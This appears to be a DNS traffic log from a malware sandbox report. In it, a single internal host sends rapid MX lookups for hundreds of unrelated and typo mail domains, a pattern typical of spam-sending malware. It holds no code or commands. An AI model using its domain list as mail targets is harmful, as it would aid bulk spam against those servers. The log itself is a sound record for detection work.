                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:38.936420918 CEST213.251.188.131192.168.2.30xcd38No error (0)visiorisk.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:38.936420918 CEST213.251.188.131192.168.2.30xcd38No error (0)visiorisk.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:38.965146065 CEST194.204.196.34192.168.2.30xcd38No error (0)scbcameroun.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:38.983263016 CEST212.109.32.15192.168.2.30xcd38No error (0)svitonline.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:38.983263016 CEST212.109.32.15192.168.2.30xcd38No error (0)svitonline.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:38.983263016 CEST212.109.32.15192.168.2.30xcd38No error (0)svitonline.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:38.983263016 CEST212.109.32.15192.168.2.30xcd38No error (0)svitonline.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:38.983263016 CEST212.109.32.15192.168.2.30xcd38No error (0)svitonline.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:39.037550926 CEST1.1.1.1192.168.2.30xc2a9No error (0)eel.dnspod.net1.12.0.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:39.037550926 CEST1.1.1.1192.168.2.30xc2a9No error (0)eel.dnspod.net112.80.181.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:39.037550926 CEST1.1.1.1192.168.2.30xc2a9No error (0)eel.dnspod.net117.89.178.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:39.037550926 CEST1.1.1.1192.168.2.30xc2a9No error (0)eel.dnspod.net120.241.130.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:39.037550926 CEST1.1.1.1192.168.2.30xc2a9No error (0)eel.dnspod.net129.211.176.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:39.067034006 CEST107.155.71.103192.168.2.30x733aNo error (0)logicsupport.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:39.078571081 CEST162.159.26.217192.168.2.30x733aNo error (0)adorfon.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:39.272903919 CEST1.12.0.4192.168.2.30x1e3bNo error (0)sunshineblp.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:39.272903919 CEST1.12.0.4192.168.2.30x1e3bNo error (0)sunshineblp.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:39.371828079 CEST1.1.1.1192.168.2.30xa920No error (0)ns1.ccf-dns.com64.72.64.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:39.538472891 CEST1.1.1.1192.168.2.30xa633No error (0)dns2.orbis.hr88.99.131.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:39.538712025 CEST162.159.26.136192.168.2.30x323dNo error (0)dnsdeer.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:39.538712025 CEST162.159.26.136192.168.2.30x323dNo error (0)dnsdeer.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:39.608562946 CEST64.72.64.10192.168.2.30x323dNo error (0)hvhs.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:39.608562946 CEST64.72.64.10192.168.2.30x323dNo error (0)hvhs.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:39.707166910 CEST1.1.1.1192.168.2.30x3817No error (0)ns1.hostpro.ua91.239.235.156A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:39.759747982 CEST162.159.26.212192.168.2.30x993eNo error (0)rightstartmortgage.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:39.767977953 CEST209.61.212.151192.168.2.30x993eNo error (0)gaml.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:39.862463951 CEST88.99.131.43192.168.2.30x993eNo error (0)paradigma.bizMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:39.872961044 CEST1.1.1.1192.168.2.30x3ad6No error (0)pdns3.ultradns.org199.7.68.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:39.918776035 CEST1.1.1.1192.168.2.30xecd2Name error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:40.036938906 CEST199.7.68.1192.168.2.30xbc40No error (0)songwriter.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:40.036938906 CEST199.7.68.1192.168.2.30xbc40No error (0)songwriter.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:40.038160086 CEST162.159.26.136192.168.2.30xbc40Name error (3)oranek.comnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:40.044449091 CEST91.239.235.156192.168.2.30x1040No error (0)zhuko.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:40.199764013 CEST1.1.1.1192.168.2.30x6e6dNo error (0)ns1.host-anycast.it185.84.96.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:40.231470108 CEST1.1.1.1192.168.2.30x945dNo error (0)btsi.com.ph69.46.30.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:40.364394903 CEST205.251.193.246192.168.2.30xcf42No error (0)modeinfo.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:40.364394903 CEST205.251.193.246192.168.2.30xcf42No error (0)modeinfo.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:40.366048098 CEST162.159.26.136192.168.2.30xcf42No error (0)asorent.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:40.366048098 CEST162.159.26.136192.168.2.30xcf42No error (0)asorent.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:40.367934942 CEST108.162.192.224192.168.2.30xcf42No error (0)rentinriga.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:40.429399014 CEST1.1.1.1192.168.2.30x9aa1No error (0)ns1.mainehost.net206.189.214.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:40.516904116 CEST185.84.96.5192.168.2.30xcf42No error (0)expotaranto.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:40.516904116 CEST185.84.96.5192.168.2.30xcf42No error (0)expotaranto.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:40.520237923 CEST1.1.1.1192.168.2.30xc4f9No error (0)skypearl.com153.122.170.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:40.606652021 CEST206.189.214.6192.168.2.30x8544No error (0)victoriamansion.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:40.894850969 CEST1.1.1.1192.168.2.30x5e7bNo error (0)n1.02.net82.132.128.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.070650101 CEST162.251.82.122192.168.2.30x323dServer failure (2)deepakfasteners.comnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.115473032 CEST162.159.26.110192.168.2.30xf48No error (0)rjii.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.115473032 CEST162.159.26.110192.168.2.30xf48No error (0)rjii.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.122795105 CEST209.98.98.1192.168.2.30xf48No error (0)iaxs.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.122795105 CEST209.98.98.1192.168.2.30xf48No error (0)iaxs.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.122795105 CEST209.98.98.1192.168.2.30xf48No error (0)iaxs.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.122795105 CEST209.98.98.1192.168.2.30xf48No error (0)iaxs.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.200741053 CEST1.1.1.1192.168.2.30x2779No error (0)ns2.qlc.co.in115.112.230.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.208888054 CEST194.0.40.1192.168.2.30xf48Name error (3)vitor.tknonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.219141006 CEST82.132.128.98192.168.2.30xf48No error (0)o2.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.219141006 CEST82.132.128.98192.168.2.30xf48No error (0)o2.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.219141006 CEST82.132.128.98192.168.2.30xf48No error (0)o2.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.219141006 CEST82.132.128.98192.168.2.30xf48No error (0)o2.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.383057117 CEST149.112.112.112192.168.2.30x414aNo error (0)inosat.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.383057117 CEST149.112.112.112192.168.2.30x414aNo error (0)inosat.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.383057117 CEST149.112.112.112192.168.2.30x414aNo error (0)inosat.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.392699957 CEST8.8.8.8192.168.2.30x414aNo error (0)gmzil.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.396400928 CEST208.67.220.220192.168.2.30x514aNo error (0)hearst.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.396400928 CEST208.67.220.220192.168.2.30x514aNo error (0)hearst.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.419266939 CEST208.67.222.222192.168.2.30x614aNo error (0)pythian.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.419266939 CEST208.67.222.222192.168.2.30x614aNo error (0)pythian.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.419504881 CEST1.1.1.1192.168.2.30x614aNo error (0)mdaltd.org.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.419504881 CEST1.1.1.1192.168.2.30x614aNo error (0)mdaltd.org.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.419711113 CEST1.0.0.1192.168.2.30x514aNo error (0)anitadarkvideos.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.419711113 CEST1.0.0.1192.168.2.30x514aNo error (0)anitadarkvideos.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.421256065 CEST1.1.1.1192.168.2.30x514aNo error (0)anitadarkvideos.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.421256065 CEST1.1.1.1192.168.2.30x514aNo error (0)anitadarkvideos.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.424132109 CEST8.8.4.4192.168.2.30x614aNo error (0)emial.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.424640894 CEST8.8.8.8192.168.2.30x614aName error (3)placemail.onlinenonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.428875923 CEST9.9.9.9192.168.2.30x704aNo error (0)lbconstructioninc.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.428875923 CEST9.9.9.9192.168.2.30x704aNo error (0)lbconstructioninc.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.428875923 CEST9.9.9.9192.168.2.30x704aNo error (0)lbconstructioninc.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.428875923 CEST9.9.9.9192.168.2.30x704aNo error (0)lbconstructioninc.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.428875923 CEST9.9.9.9192.168.2.30x704aNo error (0)lbconstructioninc.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.430895090 CEST208.67.222.222192.168.2.30x704aNo error (0)rentinriga.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.432140112 CEST149.112.112.112192.168.2.30x704aNo error (0)jointviews.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.432140112 CEST149.112.112.112192.168.2.30x704aNo error (0)jointviews.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.432140112 CEST149.112.112.112192.168.2.30x704aNo error (0)jointviews.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.432140112 CEST149.112.112.112192.168.2.30x704aNo error (0)jointviews.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.432140112 CEST149.112.112.112192.168.2.30x704aNo error (0)jointviews.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.434865952 CEST9.9.9.9192.168.2.30x704aNo error (0)c1oramn.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.434865952 CEST9.9.9.9192.168.2.30x704aNo error (0)c1oramn.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.439109087 CEST208.67.222.222192.168.2.30x414aName error (3)nyrmusic.comnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.447052956 CEST149.112.112.112192.168.2.30x804aNo error (0)eilhk.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.447525978 CEST149.112.112.112192.168.2.30x804aNo error (0)foodallergy.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.450361013 CEST149.112.112.112192.168.2.30x804aName error (3)1thecity.biznonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.452694893 CEST1.1.1.1192.168.2.30x414aNo error (0)dessy.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.452694893 CEST1.1.1.1192.168.2.30x414aNo error (0)dessy.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.453727007 CEST208.67.220.220192.168.2.30x804aNo error (0)sonic.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.453727007 CEST208.67.220.220192.168.2.30x804aNo error (0)sonic.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.461909056 CEST149.112.112.112192.168.2.30x904aNo error (0)logicify.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.463371038 CEST208.67.220.220192.168.2.30x514aNo error (0)gmile.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.465862989 CEST1.1.1.1192.168.2.30x414aNo error (0)prtc.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.465862989 CEST1.1.1.1192.168.2.30x414aNo error (0)prtc.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.465862989 CEST1.1.1.1192.168.2.30x414aNo error (0)prtc.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.466346025 CEST8.8.4.4192.168.2.30x904aNo error (0)auchan.ptMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.466912031 CEST208.67.220.220192.168.2.30x904aNo error (0)markerman.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.476443052 CEST1.1.1.1192.168.2.30x9f4aNo error (0)axa-im.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.476443052 CEST1.1.1.1192.168.2.30x9f4aNo error (0)axa-im.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.476917982 CEST149.112.112.112192.168.2.30x9f4aNo error (0)coreconsulting.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.478558064 CEST8.8.4.4192.168.2.30x614aNo error (0)yotanka.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.478558064 CEST8.8.4.4192.168.2.30x614aNo error (0)yotanka.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.478558064 CEST8.8.4.4192.168.2.30x614aNo error (0)yotanka.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.480530024 CEST208.67.222.222192.168.2.30x614aNo error (0)homebeautiful.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.484321117 CEST8.8.4.4192.168.2.30x9f4aNo error (0)illinoisalumni.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.484321117 CEST8.8.4.4192.168.2.30x9f4aNo error (0)illinoisalumni.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.494473934 CEST9.9.9.9192.168.2.30xaf4aNo error (0)victoryconnect.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.494473934 CEST9.9.9.9192.168.2.30xaf4aNo error (0)victoryconnect.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.494853973 CEST208.67.220.220192.168.2.30x414aNo error (0)me-cfs.infoMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.494853973 CEST208.67.220.220192.168.2.30x414aNo error (0)me-cfs.infoMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.502543926 CEST1.0.0.1192.168.2.30x9f4aNo error (0)easybuygos.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.504396915 CEST1.0.0.1192.168.2.30x804aNo error (0)prodigy.net.mxMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.504396915 CEST1.0.0.1192.168.2.30x804aNo error (0)prodigy.net.mxMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.504396915 CEST1.0.0.1192.168.2.30x804aNo error (0)prodigy.net.mxMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.505896091 CEST1.0.0.1192.168.2.30xbe4aNo error (0)oulook.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.506484032 CEST208.67.220.220192.168.2.30xaf4aNo error (0)comstarauto.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.508050919 CEST9.9.9.9192.168.2.30xbe4aNo error (0)vixmalls.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.510915995 CEST1.0.0.1192.168.2.30x9f4aNo error (0)ukg.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.510915995 CEST1.0.0.1192.168.2.30x9f4aNo error (0)ukg.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.512558937 CEST208.67.220.220192.168.2.30x614aNo error (0)prtcnet.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.515454054 CEST1.0.0.1192.168.2.30xbe4aNo error (0)morganlewis.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.515454054 CEST1.0.0.1192.168.2.30xbe4aNo error (0)morganlewis.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.515454054 CEST1.0.0.1192.168.2.30xbe4aNo error (0)morganlewis.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.515454054 CEST1.0.0.1192.168.2.30xbe4aNo error (0)morganlewis.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.522372007 CEST208.67.222.222192.168.2.30xce4aNo error (0)gwyneddwealthpartners.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.523248911 CEST8.8.4.4192.168.2.30x9f4aNo error (0)peoplescom.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.525336981 CEST9.9.9.9192.168.2.30x904aNo error (0)metro-trust.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.529757977 CEST208.67.220.220192.168.2.30xce4aNo error (0)choice-furniture.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.529757977 CEST208.67.220.220192.168.2.30xce4aNo error (0)choice-furniture.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.529891014 CEST1.0.0.1192.168.2.30x804aNo error (0)domenicamato.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.530261040 CEST149.112.112.112192.168.2.30xce4aNo error (0)new-purse.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.530330896 CEST9.9.9.9192.168.2.30xce4aNo error (0)miles.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.535346985 CEST9.9.9.9192.168.2.30x9f4aNo error (0)hughes.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.535346985 CEST9.9.9.9192.168.2.30x9f4aNo error (0)hughes.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.536009073 CEST208.67.220.220192.168.2.30x414aNo error (0)sumix.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.536009073 CEST208.67.220.220192.168.2.30x414aNo error (0)sumix.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.536402941 CEST149.112.112.112192.168.2.30xc84bNo error (0)napismi.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.536402941 CEST149.112.112.112192.168.2.30xc84bNo error (0)napismi.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.536402941 CEST149.112.112.112192.168.2.30xc84bNo error (0)napismi.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.536402941 CEST149.112.112.112192.168.2.30xc84bNo error (0)napismi.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.536464930 CEST8.8.8.8192.168.2.30xbe4aNo error (0)sequere.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.539684057 CEST149.112.112.112192.168.2.30xbe4aNo error (0)vishalmangalwadi.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.540499926 CEST1.1.1.1192.168.2.30xde4aNo error (0)plantasmediterraneas.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.540499926 CEST1.1.1.1192.168.2.30xde4aNo error (0)plantasmediterraneas.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.540499926 CEST1.1.1.1192.168.2.30xde4aNo error (0)plantasmediterraneas.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.540499926 CEST1.1.1.1192.168.2.30xde4aNo error (0)plantasmediterraneas.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.540499926 CEST1.1.1.1192.168.2.30xde4aNo error (0)plantasmediterraneas.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.540914059 CEST9.9.9.9192.168.2.30xc84bNo error (0)gmaiul.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.541114092 CEST8.8.8.8192.168.2.30x9f4aNo error (0)idealtile.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.541114092 CEST8.8.8.8192.168.2.30x9f4aNo error (0)idealtile.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.542273045 CEST1.0.0.1192.168.2.30x704aName error (3)dergavoldop.infononenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.542746067 CEST149.112.112.112192.168.2.30x514aNo error (0)icsi.aeMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.554382086 CEST9.9.9.9192.168.2.30xc84bNo error (0)meta-lab.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.556281090 CEST149.112.112.112192.168.2.30x614aNo error (0)cpacanada.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.557020903 CEST8.8.8.8192.168.2.30xbe4aNo error (0)pullman.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.557899952 CEST1.1.1.1192.168.2.30xaf4aNo error (0)netoverdrive.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.557899952 CEST1.1.1.1192.168.2.30xaf4aNo error (0)netoverdrive.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.557899952 CEST1.1.1.1192.168.2.30xaf4aNo error (0)netoverdrive.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.557899952 CEST1.1.1.1192.168.2.30xaf4aNo error (0)netoverdrive.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.558993101 CEST1.1.1.1192.168.2.30x804aNo error (0)dowser.com.auMX (Mail exchange)IN (0x0001)false
